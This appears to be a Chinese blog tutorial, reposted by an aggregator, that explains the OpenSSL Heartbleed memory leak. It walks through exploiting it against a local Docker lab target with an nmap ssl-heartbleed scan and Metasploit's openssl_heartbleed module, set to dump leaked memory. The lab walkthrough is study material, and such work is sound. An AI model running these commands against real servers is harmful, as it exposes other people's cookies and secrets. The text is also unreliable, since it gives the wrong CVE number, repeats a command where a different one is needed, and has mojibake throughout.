Heartbleed心臟出血原理及漏洞復(fù)現(xiàn)（CVE-2014-0106）

• 漏洞簡(jiǎn)介
• 漏洞原理
• 漏洞復(fù)現(xiàn)

漏洞簡(jiǎn)介

心臟出血是OpenSSL庫中的一個(gè)內(nèi)存漏洞，攻擊者利用這個(gè)漏洞可以服務(wù)到目標(biāo)進(jìn)程內(nèi)存信息，如其他人的Cookie等敏感信息。

漏洞原理

心臟出血漏洞主要通過攻擊者模擬向服務(wù)器端發(fā)送自己編寫的Heartbeat心跳數(shù)據(jù)包，主要是HeartbeatMessage的長(zhǎng)度與payload的length進(jìn)行匹配，若payload_lenght長(zhǎng)度大于HeartbeatMes sage的length，則會(huì)在服務(wù)器返回的response響應(yīng)包中產(chǎn)生數(shù)據(jù)溢出，造成有用數(shù)據(jù)泄露。

漏洞復(fù)現(xiàn)

1、啟動(dòng)環(huán)境

docker ps -a

2、查看靶機(jī)IP

docker ps -a

3、打開kali，使用nmap掃描，使用script ssl-heartbleed.nse板塊
命令如下：nmap -sV -p 443 –script ssl-heartbleed.nse 192.168.18.132

nmap -sV -p 443 –script ssl-heartbleed.nse 192.168.18.132

確實(shí)是存在heartbleed漏洞的
4、然后打開msf

msfconsole

5、用msf的heartbleed模塊，實(shí)現(xiàn)Heartbleed漏洞的利用。
show options查看參數(shù)。

use auxiliary/scanner/ssl/openssl_heartbleed show options

6、設(shè)置靶機(jī)的ip地址

set RHOST 192.168.18.132

7、設(shè)置verbose展示細(xì)節(jié)，顯示leak出來的數(shù)據(jù)，多次run可能看到關(guān)鍵隱私信息

set verbose true run

總結(jié)

以上是生活随笔為你收集整理的Heartbleed心脏出血原理及漏洞复现（CVE-2014-0106）的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。